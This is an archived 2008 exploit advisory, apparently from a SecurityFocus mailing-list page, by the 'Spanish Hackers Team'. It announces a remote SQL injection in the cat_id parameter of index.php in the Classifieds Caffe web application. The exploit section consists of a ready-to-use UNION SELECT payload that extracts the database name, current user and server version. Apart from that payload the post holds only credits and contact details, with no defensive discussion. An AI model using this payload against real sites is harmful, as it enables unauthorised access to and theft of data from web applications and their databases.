Classifieds Caffe (index.php cat_id) Remote SQL Injection Apr 16 2008 08:16PM
sys-project hotmail com
--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--

--==+ Classifieds Caffe (index.php cat_id) Remote SQL Injection +==--

--==+===================================================================
=================+==--

[+] [JosS] + [Spanish Hackers Team] + [Sys - Project]

[+] Info:

[~] Software: Classifieds Caffe

[~] Exploit: Remote SQL Injection [High]

[~] Where: index.php

[~] Bug Found By: JosS

[~] Contact: sys-project[at]hotmail.com

[~] Web: http://www.spanish-hackers.com

[+] Exploit:

[~] /index.php?action=add&cat_id=[SQL]

[~] 7'+union+all+select+0,1,convert(concat(database(),char(58),user(),char(5
8),version()),char),3/*

--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--

--==+ JosS +==--

--==+===================================================================
=================+==--

[+] [The End]

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus